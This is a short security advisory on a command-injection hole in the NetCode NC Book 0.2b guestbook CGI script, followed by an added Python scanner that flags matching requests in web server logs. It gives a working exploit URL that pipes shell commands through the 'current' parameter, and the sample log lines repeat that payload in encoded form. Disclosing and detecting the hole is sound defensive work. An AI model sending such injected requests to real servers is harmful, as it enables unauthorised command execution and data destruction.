NetCode NC Book 0.2b remote command execution



COMMAND

    NC Book

SYSTEMS AFFECTED

    NetCode NC Book 0.2b

PROBLEM

    'digitalseed' posted the following.  A pretty big hole in the main
    script of that guestbook leads to command execution on the  remote
    server running this vulnerable Perl script.  Exploit:

        http://target/cgi-bin/ncbook/book.cgi?action=default&current=|ls -la/|&form_tid=996604045&prev=main.html&list_message_index=10

    When requested, the above line will output the file contents of the
    kernel dir.  You can also execute any commands (ls, cat, rm, etc.).
    Original discovery: digitalseed and ksenor.

SOLUTION

    Nothing yet.
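
    With no fix available, requests that match the pattern above can at
    least be found in web server access logs. The following is an added
    example, not part of the original advisory: it assumes Common/Combined
    Log Format, and the sample log lines, the main.html value for
    'current' and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a Common/Combined Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Characters a guestbook page name never needs but a shell interprets.
SHELL_META = re.compile(r'[|;&`$<>\r\n]')
SCRIPT_SUFFIX = "/book.cgi"  # script name taken from the advisory URL

# Constructed sample entries (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2001:10:00:00 +0000] "GET /cgi-bin/ncbook/book.cgi?action=default&current=main.html&form_tid=996604045 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Aug/2001:10:02:13 +0000] "GET /cgi-bin/ncbook/book.cgi?action=default&current=%7Cls%20-la/%7C&form_tid=996604045 HTTP/1.0" 200 2048',
    '198.51.100.7 - - [01/Aug/2001:10:02:40 +0000] "GET /cgi-bin/ncbook/book.cgi?action=default&current=%257Cls%257C HTTP/1.0" 200 311',
    '192.0.2.10 - - [01/Aug/2001:10:05:00 +0000] "GET /index.html?current=%7Cx HTTP/1.0" 200 900',
]


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded '|' (%257C) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_current(log_line):
    """Return the decoded 'current' value if it holds shell metacharacters, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith(SCRIPT_SUFFIX):
        return None  # only the guestbook script is of interest here
    for raw in parse_qs(target.query, keep_blank_values=True).get("current", []):
        value = decode_fully(raw)
        if SHELL_META.search(value):
            return value
    return None


def scan(lines):
    """Return (line_index, decoded_value) for every flagged log entry."""
    hits = ((i, suspicious_current(line)) for i, line in enumerate(lines))
    return [(i, value) for i, value in hits if value is not None]
```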